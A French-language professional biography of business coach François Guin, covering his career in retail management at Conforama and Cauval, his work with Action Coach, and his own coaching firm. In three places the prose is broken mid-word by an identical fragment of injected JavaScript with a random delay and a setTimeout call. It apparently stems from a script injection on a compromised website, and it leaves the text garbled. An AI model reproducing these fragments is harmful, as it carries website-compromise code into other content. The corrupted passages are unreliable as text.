Mon Parcours

FRANÇOIS GUIN

 

François

 

« Le grdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and but de la vie n’est pas le savoir mais l’action . » Thomas Huxley

François Guin , a acquis une expertise en management commercial d’entreprise dans la distribution spécialisée, en France et à l’international.
Diplômé de l’European Business School, François Guin a fait un master spécialisé en Distribution en 1990 à l’ESCP, et a bénéficié comme cadre dirigeant du programme de spécialisation avancée « PPR Unext » en Finance, Marketing et Ressources Humaines chez PPR où il a passé une grdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande partie de sa vie professionnelle.
François Guin, chez Conforama a occupé des postes opérationnels en magasin : Chef de Département, Directeur de magasin et Directeur régional des Ventes, mais aussi des postes fonctionnels comme celui de Directeur du Marketing de l’Offre ou Directeur du Nouveau Positionnement ainsi que Directeur de la Stratégie d’achat du groupe.
En tant que Directeur Général, il crée en start-up la filiale en Pologne de Conforama à Varsovie en 1998, et dirige le repositionnement de la filiale au Portugal à Lisbonne en 2005.C’est dans ce cadre que le coaching des équipes, avec une vision d’entreprise ambitieuse et grâce au transfert de savoir faire aux équipes lui permet de lancer sa carrière de Coach permettant le développement avec succès de ces Business Unit .Ce cumul d’expertise dans les domaine des Achats de la Vente, du Marketing et de la Gestion sont les bases du Coaching d’affaire .
Plus récemment et jusqu’en 2010, il occupe le poste de Directeur du Développement Distribution au sein du groupe industriel Cauval (literie,siège et cuisine) leader en France. A ce poste, il met en oeuvre la restructuration d’une PME, « Omoté » avec une remise à plat complète de son offre commerciale, de sa logistique et de son positionnement pour lui permettre de reconquérir son marché grâce à une politique de marque haut de gamme.
En tant que Coach d’affaire, François Guin met à disposition ce cumul d’expérience, en s’appuyant sur les méthodes Action Coach pour accompagner les dirigeants d’entreprise dans le développement de leur affaire avec sérénité et efficacité autour de quatre axes:

- Observer ce qu’ils ne peuvent voir par eux-mêmes, qudom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and ils ont le nez dans le guidon.
- Identifier les stratégies éprouvées qui les feront gagner plus vite que les autres.
- Mettre en œuvre ces stratégies avec efficacité .
- Se lancer dans l’action avec une discipline de sportif de haut niveau.

En intégrant le groupe Action Coach, en 2010,  François Guin se met au service des clients du premier groupe de coaching d’affaires. Il rejoint ainsi plus de 1300 coachs répartis dans 28 pays. Ses interventions s’articulent autour des domaines clés de l’entreprise :
La Stratégie, La Vente, Le Marketing, Les Equipes, Les Systèmes opérationnels, les Finances et le Service client. Pour cela il utilise les modèles structurants mis au point par Action Coach depuis 1993, et testés avec succès auprès de milliers d’entrepreneurs.

 

IMG_1859

 

En 2016, François Guin crée sa propre structure d'accompagnement et de formation avec une nouvelle approche "VOIR PLUS , FAIRE PLUS" qui donne accès aux Dirigeants , Chefs d'entreprise, la dynamique d'un état d'esprit positif et l'enthousiasme pour atteindre de nouveaux objectifs.La mission de POSITIVE TREND se résume ainsi :

VOUS INSPIRER, VOUS MOBILISER pour faire ce qui vous passionne en réalisant vos rêves !